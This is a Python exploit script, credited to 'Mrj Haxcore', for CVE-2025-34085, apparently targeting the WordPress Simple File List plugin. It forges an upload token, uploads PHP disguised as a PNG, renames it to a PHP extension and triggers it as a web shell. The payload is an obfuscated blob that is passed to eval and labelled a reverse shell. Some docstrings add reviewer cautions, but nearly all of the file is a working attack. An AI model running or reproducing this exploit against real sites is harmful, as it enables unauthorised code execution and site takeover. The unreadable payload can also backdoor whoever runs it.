#!/usr/bin/env python3
# Exploit for CVE-2025-34085
# By Mrj Haxcore

# ASCII-art banner printed by main() before anything is sent to the target.
# Raw string so the art's backslashes are kept verbatim; nothing parses it.
banner = r"""
   _______      ________            ___   ___ ___  _____            ____  _  _    ___   ___  _____ 
  / ____\ \    / /  ____|          |__ \ / _ \__ \| ____|          |___ \| || |  / _ \ / _ \| ____|
 | |     \ \  / /| |__     ______     ) | | | | ) | |__    ______    __) | || |_| | | | (_) | |__  
 | |      \ \/ / |  __|   |______|   / /| | | |/ /|___ \  |______|  |__ <|__   _| | | |> _ <|___ \ 
 | |____   \  /  | |____            / /_| |_| / /_ ___) |           ___) |  | | | |_| | (_) |___) |
  \_____|   \/   |______|          |____|\___/____|____/           |____/   |_|  \___/ \___/|____/ 
                                                                                                    
                          CVE-2025-34085 Unauthenticated RCE Exploit
                                  Coded by Mrj Haxcore
"""

import requests
import hashlib
import time
import random
import string
import sys
import uuid

def rand_str(n: int = 8) -> str:
    """Return ``n`` random characters drawn from ``[a-z0-9]``.

    main() uses the result as the base name of the file dropped on the
    target, so repeated runs do not collide.  ``random`` (CPython's
    Mersenne Twister, seeded from the OS) is adequate for uniqueness; note
    that the dropped file is reachable by anyone who learns its path, so
    the name is the only thing keeping third parties off it while it exists.
    """
    alphabet = string.ascii_lowercase + string.digits
    picked = random.choices(alphabet, k=n)
    return "".join(picked)

# ====================== [ MODIFIED: CUSTOM REVERSE SHELL PAYLOAD ] ======================
def generate_payload() -> str:
    """Return the PHP source that upload_shell() writes into the dropped file.

    WARNING (review): this is an opaque, multi-layer obfuscated blob.  The
    wrapper decodes it as base64 -> str_rot13 -> gzinflate -> (each byte - 6)
    and then passes the result to eval().  Nothing in this file shows what the
    decoded PHP actually does.  The section comment above calls it a "reverse
    shell", while trigger_shell() below drives the dropped file as a web shell
    that reads a ``cmd`` query parameter -- at least one of those descriptions
    is wrong.  Reverse the chain offline and read the plaintext before pointing
    this at any host: a PoC that ships an unreadable payload is a well-known
    way to backdoor the operator (or the target beyond the agreed scope), and
    running unreviewed code on a system you are authorised to test still
    breaches most engagement rules.
    """
    return '''
    function JgSd($sa48vzi3OnkajK) {
        $sa48vzi3OnkajK = gzinflate(str_rot13(base64_decode($sa48vzi3OnkajK)));
        for ($o=0;$o<strlen($sa48vzi3OnkajK);$o++) {
            $sa48vzi3OnkajK[$o] = chr(ord($sa48vzi3OnkajK[$o])-6);
        }
        return $sa48vzi3OnkajK;
    }
    $sa48vzi3OnkajK = "epDBd4UwEFI/wb8YghCFtmLfdNy1Qyi0YGoiEmisoYmROBa0vB+vRAuPtlA2w5zce3RHC5EaVKQoLF9fsrecK8uLOIYv8BU61YAAxs57WJXt1z4sH5+eH7KcLxUvZd5Yg7w4kI9q+5cgM5TXlLqy/VR39fe1dAjCpZq95JrlYViweEBg7CeW06CtebApW6Ux8vY3/lC8UAHWnQWWVRh21ihrerVo9w4bDp3DSXmC6bFMZZLpserFP9Qjrim8BkJN6wwYpM42gvlbMZA1KdsLxgD7muYBBTOTJjVVVCfP3zaSJFgT1Q8TwUH4nAz8ooIt1a9uNkhT0c9LTAZ2siml/AyXYg==";
    eval(JgSd($sa48vzi3OnkajK));
    '''
# =========================================================================================

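def _multipart_body(boundary: str, fields: dict, file_name: str, file_bytes: bytes) -> bytes:
    """Serialise ``fields`` plus one ``file`` part as multipart/form-data.

    Built by hand rather than with ``requests``' ``files=`` so the part
    order, field names and the declared ``image/png`` type are exactly what
    the original request sent to the upload engine.
    """
    parts = []
    for name, value in fields.items():
        parts.append(
            (
                f"--{boundary}\r\n"
                f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
                f"{value}\r\n"
            ).encode()
        )
    parts.append(
        (
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="file"; filename="{file_name}"\r\n'
            f"Content-Type: image/png\r\n\r\n"
        ).encode()
        + file_bytes
        + f"\r\n--{boundary}--\r\n".encode()
    )
    return b"".join(parts)


def upload_shell(target: str, filename: str, payload: str) -> bool:
    """Upload ``payload`` as ``<filename>.png`` via the plugin's upload engine.

    The PHP is stored under a .png name with an ``image/png`` type; it only
    becomes executable once rename_shell() gives it a PHP extension.  The
    original version of this function ignored ``filename`` and used a fixed
    name, which left rename_shell()/trigger_shell() looking for a different
    file than the one uploaded.

    Args:
        target: Base URL of the WordPress site, without a trailing slash.
        filename: Base name (no extension); pass the same value to
            rename_shell().  Must be letters and digits only.
        payload: PHP source; wrapped in ``<?php ... ?>`` here.

    Returns:
        True when the engine answered HTTP 200 with ``SUCCESS`` in the body,
        False on a transport error or any other response.

    Raises:
        ValueError: if ``filename`` is empty or not alphanumeric.
    """
    # The name is interpolated unquoted into a multipart header; keep it to
    # the characters rand_str() produces so it cannot break our own request.
    if not filename or not filename.isalnum():
        raise ValueError(f"refusing unsafe upload name: {filename!r}")

    boundary = f"----WebKitFormBoundary{uuid.uuid4().hex[:16]}"
    upload_url = f"{target}/wp-content/plugins/simple-file-list/ee-upload-engine.php"
    upload_dir = "/wp-content/uploads/simple-file-list/"
    timestamp = str(int(time.time()))
    # The request "token" is md5('unique_salt' + timestamp): a constant salt
    # that any client can recompute.  Presumably this mirrors how the upload
    # engine validates the request, which is why no WordPress session is
    # needed -- confirm against the plugin source for the version under test.
    token = hashlib.md5(f"unique_salt{timestamp}".encode()).hexdigest()

    fields = {
        "eeSFL_ID": "1",
        "eeSFL_FileUploadDir": upload_dir,
        "eeSFL_Timestamp": timestamp,
        "eeSFL_Token": token,
    }
    upload_name = f"{filename}.png"
    body = _multipart_body(boundary, fields, upload_name, f"<?php {payload} ?>".encode())

    # Browser-looking headers, kept as in the original request; whether the
    # engine actually checks Referer/Origin is not known from here.
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Referer": f"{target}/wp-admin",
        "Origin": target,
        "Accept": "*/*",
    }

    print(f"[+] Uploading shell as {upload_name}...")
    try:
        r = requests.post(upload_url, data=body, headers=headers, timeout=10)
    except requests.RequestException as e:
        print(f"[-] Upload request failed: {e}")
        return False

    if r.status_code == 200 and "SUCCESS" in r.text:
        print("[+] Upload successful.")
        return True
    print(f"[-] Upload failed. Response code: {r.status_code}")
    return False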

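def rename_shell(target: str, filename: str) -> "str | None":
    """Rename the uploaded ``<filename>.png`` to a PHP-executable extension.

    Tries each candidate extension through the plugin's ``ee-file-engine.php``
    rename action and returns the first new name the engine accepts.  The
    original version ignored ``filename`` and renamed a fixed name, which did
    not match what upload_shell() had stored.

    Args:
        target: Base URL of the WordPress site, without a trailing slash.
        filename: Base name passed to upload_shell().

    Returns:
        The new file name (e.g. ``<filename>.php``) on success, else None.

    Caveats:
        * Success is judged on HTTP 200 alone because the engine's response
          format is not known here; a 200 carrying an error body would be
          reported as success.  trigger_shell() is the real confirmation.
        * After the first accepted rename the ``.png`` no longer exists, so
          any later candidate would fail anyway -- hence the early return.
    """
    url = f"{target}/wp-content/plugins/simple-file-list/ee-file-engine.php"
    # Alternative PHP extensions plus a mixed-case variant, in case the server
    # only blocks a literal ".php".  Which of these actually execute depends on
    # the target's handler configuration, not on this script.
    extensions = ["php", "php5", "phtml", "phar", "php3", "php4", "pHp"]

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Referer": f"{target}/wp-admin",
        "Origin": target,
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest",
        "Accept": "*/*",
    }

    old_name = f"{filename}.png"
    for ext in extensions:
        new_name = f"{filename}.{ext}"
        data = {
            "eeSFL_ID": "1",
            "eeListFolder": "/",
            "eeFileOld": old_name,
            "eeFileAction": f"Rename|{new_name}",
        }

        print(f"[+] Trying to rename to: {new_name}...")
        try:
            r = requests.post(url, data=data, headers=headers, timeout=10)
        except requests.RequestException as e:
            print(f"[-] Rename request failed: {e}")
            continue

        if r.status_code == 200:
            print(f"[+] Rename successful: {new_name}")
            return new_name
        print(f"[-] Rename failed. Response code: {r.status_code}")

    print("[-] All rename attempts failed.")
    return None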

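def trigger_shell(target: str, filename: str, cmd: str = "id") -> None:
    """Request the dropped file with ``?cmd=<cmd>`` and print the response body.

    The original version ignored ``filename`` and requested a fixed path with
    no extension, so it never hit the file rename_shell() had produced.

    Args:
        target: Base URL of the WordPress site, without a trailing slash.
        filename: Name returned by rename_shell() (including its extension).
        cmd: Value sent as the ``cmd`` query parameter.  Defaults to ``id``,
            which is enough to prove execution and learn the web-server user.

    Note:
        This assumes the payload from generate_payload() acts as a web shell
        that executes ``$_GET['cmd']``; that payload is obfuscated, so the
        assumption cannot be verified from this file.  A 200 whose body
        contains our own ``<?php`` source means the file was stored but not
        executed (the chosen extension is not mapped to the PHP handler).
    """
    url = f"{target}/wp-content/uploads/simple-file-list/{filename}"
    print(f"[+] Triggering shell: {url}")

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Referer": target,
    }

    try:
        r = requests.get(url, params={"cmd": cmd}, headers=headers, timeout=10)
    except requests.RequestException as e:
        print(f"[-] Shell trigger failed: {e}")
        return

    if r.status_code != 200:
        print(f"[-] Shell returned HTTP {r.status_code}")
        return
    if "<?php" in r.text:
        # The server served our source back instead of running it.
        print("[!] Response contains PHP source -- file stored but not executed.")
    print("[+] Shell output:")
    print(r.text.strip())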

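def main() -> None:
    """Entry point: upload, rename and trigger the shell against ``argv[1]``.

    Usage: ``python3 simpleRS.py http://target.site``

    The target must include its scheme; a trailing slash is stripped because
    every helper appends its own path.  Exits non-zero on usage errors and
    when the upload or rename step fails, so the outcome is visible to a
    wrapper script.  On success a PHP file is left on the target: the path is
    printed so it can be recorded and removed during engagement cleanup --
    anyone who learns that URL can use it.
    """
    print(banner)
    if len(sys.argv) != 2:
        print(f"Usage: python3 {sys.argv[0]} http://target.site")
        sys.exit(1)

    target = sys.argv[1].rstrip("/")
    # requests would reject a scheme-less URL later with a less clear error.
    if not target.startswith(("http://", "https://")):
        print("[-] Target must start with http:// or https://")
        sys.exit(1)

    filename = rand_str()
    payload = generate_payload()

    if not upload_shell(target, filename, payload):
        sys.exit(1)
    new_filename = rename_shell(target, filename)
    if new_filename is None:
        sys.exit(1)

    dropped = f"{target}/wp-content/uploads/simple-file-list/{new_filename}"
    print(f"[!] Dropped file: {dropped} -- remove it when the test is done.")
    trigger_shell(target, new_filename)


if __name__ == "__main__":
    main()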